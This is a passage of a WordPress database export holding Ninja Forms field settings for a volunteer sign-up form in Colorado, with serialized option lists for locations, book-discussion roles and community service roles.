Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(9003,278,'custom_name_attribute','email','custom_name_attribute','email'),(9004,278,'personally_identifiable','1','personally_identifiable','1'),(9005,278,'value','','value',''),(9006,279,'editActive','','editActive',''),(9007,279,'field_label','hr','field_label','hr'),(9008,279,'field_key','hr_325','field_key','hr_325'),(9009,279,'container_class','','container_class',''),(7561,262,'key','listselect_225','key','listselect_225'),(7562,262,'container_class','one-half first','container_class','one-half first'),(7563,262,'parent_id','24','parent_id','24'),(7564,263,'objectType','Field','objectType','Field'),(7565,263,'objectDomain','fields','objectDomain','fields'),(7566,263,'editActive','','editActive',''),(7567,263,'order','7','order','7'),(7568,263,'type','hr','type','hr'),(7569,263,'label','hr','label','hr'),(7570,263,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7571,263,'show_desc','0','show_desc','0'),(7572,263,'desc_pos','none','desc_pos','none'),(7573,263,'desc_text','','desc_text',''),(7574,263,'element_class','','element_class',''),(7575,263,'key','hr_226','key','hr_226'),(7576,263,'container_class','','container_class',''),(7577,263,'parent_id','24','parent_id','24'),(7578,264,'objectType','Field','objectType','Field'),(7579,264,'objectDomain','fields','objectDomain','fields'),(7580,264,'editActive','','editActive',''),(7581,264,'order','8','order','8'),(7582,264,'type','html','type','html'),(7583,264,'label','Service Opportunities','label','Service Opportunities'),(7584,264,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7585,264,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Service Opportunities</span></span></span></strong></span></h3>\r\n<span style=\"color: #800000;\">HINT: Hold down the CTRL key to make multiple selections</span>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Service Opportunities</span></span></span></strong></span></h3>\r\n<span style=\"color: #800000;\">HINT: Hold down the CTRL key to make multiple selections</span>'),(7586,264,'desc_el','div','desc_el','div'),(7587,264,'show_desc','0','show_desc','0'),(7588,264,'desc_pos','none','desc_pos','none'),(7589,264,'desc_text','','desc_text',''),(7590,264,'element_class','','element_class',''),(7591,264,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Service Opportunities</span></span></span></strong></span></h3>\r\n<span style=\"color: #800000;\">HINT: Hold down the CTRL key to make multiple selections</span>','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Service Opportunities</span></span></span></strong></span></h3>\r\n<span style=\"color: #800000;\">HINT: Hold down the CTRL key to make multiple selections</span>'),(7592,264,'key','html_227','key','html_227'),(7593,264,'container_class','','container_class',''),(7594,264,'parent_id','24','parent_id','24'),(7595,265,'objectType','Field','objectType','Field'),(7596,265,'objectDomain','fields','objectDomain','fields'),(7597,265,'editActive','','editActive',''),(7598,265,'order','9','order','9'),(7599,265,'type','listmultiselect','type','listmultiselect'),(7600,265,'label','Book Discussions','label','Book Discussions'),(7601,265,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7602,265,'label_pos','above','label_pos','above'),(7603,265,'list_type','multi','list_type','multi'),(7604,265,'multi_size','3','multi_size','3'),(7605,265,'list_show_value','1','list_show_value','1'),(7606,265,'list','a:0:{}','list','a:0:{}'),(7607,265,'user_info_field_group','','user_info_field_group',''),(7608,265,'calc_auto_include','0','calc_auto_include','0'),(7609,265,'user_state','0','user_state','0'),(7610,265,'num_sort','0','num_sort','0'),(7611,265,'admin_label','','admin_label',''),(7612,265,'show_help','0','show_help','0'),(7613,265,'help_text','','help_text',''),(7614,265,'show_desc','0','show_desc','0'),(7615,265,'desc_pos','none','desc_pos','none'),(7616,265,'desc_text','','desc_text',''),(7617,265,'element_class','','element_class',''),(7618,265,'required','0','required','0'),(7619,265,'options','a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:30:\"Trained Arahata with prior exp\";s:5:\"value\";s:30:\"Trained Arahata with prior exp\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"Trained Assistant Arahata\";s:5:\"value\";s:25:\"Trained Assistant Arahata\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"Attendee Support\";s:5:\"value\";s:16:\"Attendee Support\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:30:\"Trained Arahata with prior exp\";s:5:\"value\";s:30:\"Trained Arahata with prior exp\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"Trained Assistant Arahata\";s:5:\"value\";s:25:\"Trained Assistant Arahata\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"Attendee Support\";s:5:\"value\";s:16:\"Attendee Support\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(9000,278,'field_key','email_324','field_key','email_324'),(9001,278,'default','','default',''),(9002,278,'container_class','','container_class',''),(7620,265,'key','listmultiselect_228','key','listmultiselect_228'),(7621,265,'container_class',' one-third first ','container_class',' one-third first '),(7622,265,'parent_id','24','parent_id','24'),(7623,266,'objectType','Field','objectType','Field'),(7624,266,'objectDomain','fields','objectDomain','fields'),(7625,266,'editActive','','editActive',''),(7626,266,'order','10','order','10'),(7627,266,'type','listmultiselect','type','listmultiselect'),(7628,266,'label','Community HU','label','Community HU'),(7629,266,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(7630,266,'label_pos','above','label_pos','above'),(7631,266,'list_type','multi','list_type','multi'),(7632,266,'multi_size','3','multi_size','3'),(7633,266,'list_show_value','1','list_show_value','1'),(7634,266,'list','a:0:{}','list','a:0:{}'),(7635,266,'user_info_field_group','','user_info_field_group',''),(7636,266,'calc_auto_include','0','calc_auto_include','0'),(7637,266,'user_state','0','user_state','0'),(7638,266,'num_sort','0','num_sort','0'),(7639,266,'admin_label','','admin_label',''),(7640,266,'show_help','0','show_help','0'),(7641,266,'help_text','','help_text',''),(7642,266,'show_desc','0','show_desc','0'),(7643,266,'desc_pos','none','desc_pos','none'),(7644,266,'desc_text','','desc_text',''),(7645,266,'element_class','','element_class',''),(7646,266,'required','0','required','0'),(7647,266,'options','a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Food Services\";s:5:\"value\";s:13:\"Food Services\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:7:\"Greeter\";s:5:\"value\";s:7:\"Greeter\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Host\";s:5:\"value\";s:4:\"Host\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 